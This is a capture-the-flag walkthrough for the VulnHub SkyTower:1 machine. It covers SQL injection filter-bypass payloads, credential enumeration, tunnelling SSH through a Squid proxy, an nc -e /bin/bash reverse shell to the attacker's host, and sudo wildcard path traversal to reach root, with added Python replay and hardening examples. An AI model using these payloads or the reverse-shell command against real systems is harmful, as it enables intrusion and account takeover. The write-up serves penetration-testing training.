VulnHub box walkthrough [SkyTower-1]

Name

Name: SkyTower: 1
Release date: 26 June 2014

Download

SkyTower.zip

  • Download (Mirror): https://download.vulnhub.com/skytower/SkyTower.zip
  • Download (Torrent): https://download.vulnhub.com/skytower/SkyTower.zip.torrent

Description

Welcome to SkyTower:1

This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts on their ability to attack a system using a multi-faceted approach and obtain the "flag".

Skills across different facets of system and application vulnerabilities will be required, as well as an understanding of various services and how to attack them. Most of all, logical thinking and a methodical approach to penetration testing will come into play in order to attack this system successfully. Try different variations and approaches. You will find that automated tools will not help you.

You are encouraged to try it on your own first, giving yourself enough time, before coming back to the walkthrough below.

Enjoy!
Telspace Systems
@telspacesystems

Information gathering

Start with nmap

root@kali:~/vulnhub/SkyTower# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.101
Host is up (0.00015s latency).
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -p- -v -sV 192.168.56.101
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20

root@kali:~# nmap -p 22,80,3128 -v -A -T4 --script=vuln 192.168.56.101
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.101:80/
| Form id:
|_ Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /login.php: Possible admin folder
|_http-server-header: Apache/2.2.22 (Debian)
| http-sql-injection:
| Possible sqli for forms:
| Form at path: /, form's action: login.php. Fields that might be vulnerable:
|_ email
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3128/tcp open http-proxy Squid http proxy 3.1.20
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-server-header: squid/3.1.20

The active nmap scan found three services: ssh, http and an http proxy.

The ssh port is filtered, so only http and the proxy are reachable from the outside. Start with http.

Running nikto and dirb against the target turned up nothing interesting.

Open the site on port 80 and capture the login request for analysis.

The email parameter is vulnerable to SQL injection.

Automated tools such as sqlmap fail to pull any data, however, because the application filters the injection keywords; a bypass payload has to be found by hand.

Sending a few requests with different kinds of characters and comparing the responses shows that the filter strips the keyword "OR", which is easily bypassed with "||".

Either of the following two payloads gets past the filter on "or". The second one works because the filter removes each occurrence of the string only once, so "oorr" collapses to "or" after filtering; note that both payloads also avoid the "=" operator, using LIKE and ">" instead.

payload1

email=' || email LIKE '%';#

payload2

'oorr 1> 0#'

Either payload bypasses authentication and displays the following.

Once logged in, the page shows a username and password in clear text and tells you to log in over ssh, but that port is filtered. Before dealing with that, enumerate all users of the web application: run a Burp Intruder instance over the prefix in the LIKE payload to brute-force every valid email, and with it each username and password.

This gives three emails: one starting with j, one with s and one with w. Logging in with each of them yields the following data.

  • Payload used: [email=' || email LIKE 'j%';#]
Username: john
Password: hereisjohn
  • Payload used: [email=' || email LIKE 'w%';#]
Username: william
Password: senseable
  • Payload used: [email=' || email LIKE 's%';#]
Username: sara
Password: ihatethisjob
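
The filter bypass and the Intruder enumeration above can be replayed offline with the following script. It is an added example, not the box's login.php (whose source the walkthrough never shows): the blacklist is an assumption that reproduces the observed behaviour (the keyword OR is stripped once, so "||" and "oorr" survive), sqlite3 stands in for MySQL with the two dialect differences that matter for these payloads ("||" as logical OR, "#" as a comment) patched in mysql_shim(), and the e-mail addresses are constructed; only the username/password pairs come from the walkthrough. The hardened login_safe() shows the parameterised query that makes both payloads inert.

```python
"""Added example, not the box's login.php: a stand-in for the SkyTower login
that reproduces the observed filter behaviour so the page's payloads and the
Intruder enumeration can be replayed offline.

Assumptions: the blacklist is a single-pass str_replace()-style removal of the
keyword OR; sqlite3 stands in for MySQL, with the two dialect differences that
matter here patched in mysql_shim(); e-mail addresses are constructed, only
the username/password pairs are the ones the walkthrough recovers.
"""
import sqlite3
import string

# Constructed sample table. Passwords are in clear text because the real app
# displays them after login, as the walkthrough output shows.
USERS = [
    ("john@example.com", "john", "hereisjohn"),
    ("sara@example.com", "sara", "ihatethisjob"),
    ("william@example.com", "william", "senseable"),
]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return db


def php_filter(value: str) -> str:
    """Assumed blacklist: every occurrence of OR is removed exactly once, as a
    single-pass str_replace() does. 'oorr' therefore collapses to 'or', and
    '||' is never touched. (It also mangles any legitimate address containing
    the letters 'or', a usual side effect of keyword stripping.)"""
    for bad in ("OR", "or"):
        value = value.replace(bad, "")
    return value


def build_query(email: str, password: str) -> str:
    """String concatenation, as a naive login.php would do it."""
    return ("SELECT username, password FROM users "
            f"WHERE email='{php_filter(email)}' AND password='{password}'")


def mysql_shim(query: str) -> str:
    """sqlite3 reads '||' as string concatenation and has no '#' comments;
    MySQL reads '||' as logical OR and '#' as a comment to end of line. Apply
    the MySQL meaning so the page's payloads run unchanged. (A '#' inside a
    string literal is not handled; none occurs in these payloads.)"""
    return query.split("#", 1)[0].replace("||", " OR ")


def login_vulnerable(db, email: str, password: str):
    """Returns (username, password), like the page's post-login view, or
    None. A query the blacklist has broken is just a failed login."""
    try:
        row = db.execute(mysql_shim(build_query(email, password))).fetchone()
    except sqlite3.Error:
        return None
    return tuple(row) if row else None


def login_safe(db, email: str, password: str):
    """Hardened form: a parameterised query, so the input is data, never SQL."""
    row = db.execute(
        "SELECT username, password FROM users WHERE email=? AND password=?",
        (email, password)).fetchone()
    return tuple(row) if row else None


def enumerate_by_prefix(login):
    """The Burp Intruder step: one LIKE-prefix payload per letter. A hit
    reveals whichever user's e-mail starts with that letter."""
    found = {}
    for c in string.ascii_lowercase:
        creds = login(f"' || email LIKE '{c}%';#", "x")
        if creds:
            found[c] = creds
    return found


if __name__ == "__main__":
    db = make_db()
    for payload in ("' OR 1=1#", "' || email LIKE '%';#", "'oorr 1> 0#'"):
        print(f"{payload!r:26} vulnerable={login_vulnerable(db, payload, 'x')}"
              f" safe={login_safe(db, payload, 'x')}")
    print(enumerate_by_prefix(lambda e, p: login_vulnerable(db, e, p)))
```

Run it and the plain ' OR 1=1# payload gives None (the blacklist broke the query), while both of the page's payloads return the john row; enumerate_by_prefix() returns a hit for j, s and w, which is the Intruder result in one call. Against login_safe() every payload returns None, because a bound parameter can only ever be compared as a value.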

With SSH usernames and passwords in hand, the next step is to log in and escalate privileges.

The problem is that the SSH port is filtered.

The port scan did find a proxy, though. Squid supports HTTP CONNECT tunnels, and since it runs on the target itself, asking it to CONNECT to 127.0.0.1:22 reaches the sshd that the firewall hides from the network. proxychains can push the ssh client through that tunnel.

Add the following line to /etc/proxychains.conf (the leftover default 127.0.0.1 1080 entry can stay when the file is in dynamic_chain mode; it is skipped, which is the "denied" line in the output below):

http 192.168.56.101 3128
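
What proxychains does for the ssh connection below can be done by hand, which is also a quick way to check that Squid's ACLs permit CONNECT to the loopback SSH port before editing /etc/proxychains.conf (a stock squid.conf only allows CONNECT to port 443, so the OK in the proxychains output is already telling). The script below is an added example, not part of the walkthrough: it sends an HTTP CONNECT to the proxy, checks for a 2xx reply and then reads the SSH banner over the same socket, which from that point on is a raw tunnel to 127.0.0.1:22 on the SkyTower box. The proxy and target addresses are those from the page; the timeout is an assumption.

```python
"""Added example, not from the walkthrough: the HTTP CONNECT tunnel that
proxychains sets up for an 'http' proxy entry, done by hand, so the Squid
ACLs can be checked before going through proxychains. Addresses are the
page's; the timeout is an assumption."""
import socket

PROXY = ("192.168.56.101", 3128)
TARGET = ("127.0.0.1", 22)   # loopback as seen from the proxy: the box's own sshd
TIMEOUT = 5.0                # assumption


def connect_request(host: str, port: int) -> bytes:
    """Request an HTTP proxy client sends to open a tunnel to host:port."""
    return (f"CONNECT {host}:{port} HTTP/1.1\r\n"
            f"Host: {host}:{port}\r\n\r\n").encode("ascii")


def parse_status(head: bytes) -> int:
    """Status code from the proxy's response head, e.g. b'HTTP/1.1 200 ...'."""
    line = head.split(b"\r\n", 1)[0]
    parts = line.split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        raise ValueError(f"not an HTTP status line: {line!r}")
    return int(parts[1])


def split_head(buf: bytes):
    """(head, leftover) once the blank line ending the head has arrived, else
    None. Leftover bytes already belong to the tunnelled stream."""
    idx = buf.find(b"\r\n\r\n")
    if idx < 0:
        return None
    return buf[:idx + 4], buf[idx + 4:]


def ssh_banner_via_connect(proxy=PROXY, target=TARGET, timeout=TIMEOUT) -> str:
    """Open the tunnel and return the first line the far end sends (an SSH
    server speaks first, 'SSH-2.0-...'). Raises if the proxy refuses."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(connect_request(*target))
        buf = b""
        while (parts := split_head(buf)) is None:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("proxy closed before answering CONNECT")
            buf += chunk
        head, data = parts
        code = parse_status(head)
        if not 200 <= code < 300:
            status = head.split(b"\r\n", 1)[0].decode(errors="replace")
            raise PermissionError(f"proxy refused the tunnel: {status}")
        # From here on the socket is end-to-end with the target port.
        while b"\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
        return data.split(b"\n", 1)[0].rstrip(b"\r").decode(errors="replace")


if __name__ == "__main__":
    print(ssh_banner_via_connect())
```

If the proxy answers 403 the function raises with Squid's status line, which separates an ACL problem from a firewall one at a glance. OpenSSH can use the same tunnel without proxychains through ProxyCommand; with the OpenBSD flavour of netcat (assumption: netcat-openbsd, which has the -X/-x options) that is ssh -o ProxyCommand='nc -X connect -x 192.168.56.101:3128 %h %p' john@127.0.0.1.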

getshell

Now try connecting over ssh from the command line:

root@kali:~/vulnhub/SkyTower# proxychains ssh john@127.0.0.1
ProxyChains-3.1 (http://proxychains.sf.net)
|D-chain|-<>-192.168.56.101:3128-<>-127.0.0.1:1080-<--denied
|D-chain|-<>-192.168.56.101:3128-<><>-127.0.0.1:22-<><>-OK
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:QYZqyNNW/Z81N86urjCUIrTBvJ06U9XDDzNv91DYaGc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa':
john@127.0.0.1's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 127.0.0.1 closed.

Logging in as william fails. Logging in as sara or john works, but the session prints "Funds have been withdrawn" and the connection closes immediately: the login shell terminates the session as soon as it starts. Pass a command on the ssh command line instead, so that no interactive login shell is started.

root@kali:~/vulnhub/SkyTower# proxychains ssh john@127.0.0.1 nc 192.168.56.102 5566 -e /bin/bash
ProxyChains-3.1 (http://proxychains.sf.net)
|D-chain|-<>-192.168.56.101:3128-<>-127.0.0.1:1080-<--denied
|D-chain|-<>-192.168.56.101:3128-<><>-127.0.0.1:22-<><>-OK
Enter passphrase for key '/root/.ssh/id_rsa':
john@127.0.0.1's password:

On the Kali side, listen on that port with nc and catch the reverse shell:

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.101: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 34901
id
uid=1000(john) gid=1000(john) groups=1000(john)
whoami
john
pwd
/home/john

Enumeration as john turns up nothing interesting, so it is time to switch accounts. william cannot log in, which leaves sara. The same reverse-shell trick as sara shows that sara can run commands with sudo:

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.101: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 34906
id
uid=1001(sara) gid=1001(sara) groups=1001(sara)
whoami
sara
sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

As shown, sara may run cat (without a password) and ls via sudo, but only with an argument matching /accounts/*. sudo compares the argument text against that glob with fnmatch(3), where * also matches /, and nothing canonicalises the path, so an argument that starts with /accounts/ and then climbs out with .. still satisfies the rule.
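
Why the rule accepts a path that ends up in /root, as an added example that is not part of the walkthrough: sudo matches the argument string against the sudoers glob with fnmatch(3) without FNM_PATHNAME, so * also matches / and the path is never normalised. Python's fnmatch has the same * behaviour, which is what the model below relies on. The safe_path() check is what a wrapper script would need if sara really must read files under /accounts; the wrapper and the directory layout are hypothetical.

```python
"""Added example, not from the walkthrough: a model of sudo's glob check for
'(root) NOPASSWD: /bin/cat /accounts/*' and the path check it lacks.
Assumptions: sudo compares the argument text to the sudoers glob with
fnmatch(3) and no FNM_PATHNAME, so '*' matches '/' too; Python's fnmatch
has the same '*' semantics. The directory layout is constructed."""
import fnmatch
import posixpath

SUDOERS_ARG_GLOB = "/accounts/*"   # from the page's sudo -l output
ALLOWED_ROOT = "/accounts"


def sudo_allows(requested: str, glob_pattern: str = SUDOERS_ARG_GLOB) -> bool:
    """What sudo checks: a textual glob match on the argument, nothing more."""
    return fnmatch.fnmatchcase(requested, glob_pattern)


def escapes_directory(requested: str, root: str = ALLOWED_ROOT) -> bool:
    """What it does not check: whether the normalised path leaves root.
    normpath collapses '..' lexically; symlinks inside /accounts would need
    os.path.realpath on the live filesystem as well."""
    norm = posixpath.normpath(requested)
    return not (norm == root or norm.startswith(root.rstrip("/") + "/"))


def safe_path(requested: str, root: str = ALLOWED_ROOT):
    """Check a hypothetical /usr/local/bin/cat-accounts wrapper would apply
    before exec'ing cat: absolute, normalised, still under root.
    Returns the normalised path, or None if the argument must be refused."""
    if not posixpath.isabs(requested) or escapes_directory(requested, root):
        return None
    return posixpath.normpath(requested)


if __name__ == "__main__":
    for arg in ("/accounts/john", "/accounts/../../../root/flag.txt"):
        print(f"{arg:40} sudo glob: {sudo_allows(arg)!s:5} "
              f"wrapper: {safe_path(arg)}")
```

The sudoers-side fix is not to leave a trailing glob on a path argument: list the permitted files explicitly, or make a wrapper that applies a check like safe_path() (plus realpath, for symlinks) the only command sara may run as root.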

Finding the flag

sudo /bin/cat /accounts/../../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower

Then log in over ssh as root with that password, and root is obtained:

root@kali:~/vulnhub/SkyTower# proxychains ssh root@127.0.0.1 -t "/bin/bash"
ProxyChains-3.1 (http://proxychains.sf.net)
|D-chain|-<>-192.168.56.101:3128-<>-127.0.0.1:1080-<--denied
|D-chain|-<>-192.168.56.101:3128-<><>-127.0.0.1:22-<><>-OK
Enter passphrase for key '/root/.ssh/id_rsa':
root@127.0.0.1's password:
root@SkyTower:~# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:~# whoami
root
root@SkyTower:~# ls
flag.txt
root@SkyTower:~# cat flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
root@SkyTower:~#

Key takeaways

  • bypassing keyword filtering in SQL injection
  • using proxychains through an http proxy to reach a filtered ssh port
  • path traversal through a wildcard in a sudoers command argument

Game over

Sorry, once again I could not find that Greek master's one-click script for this one. I am so sorry about this... It's a pity...

The end, to be continued...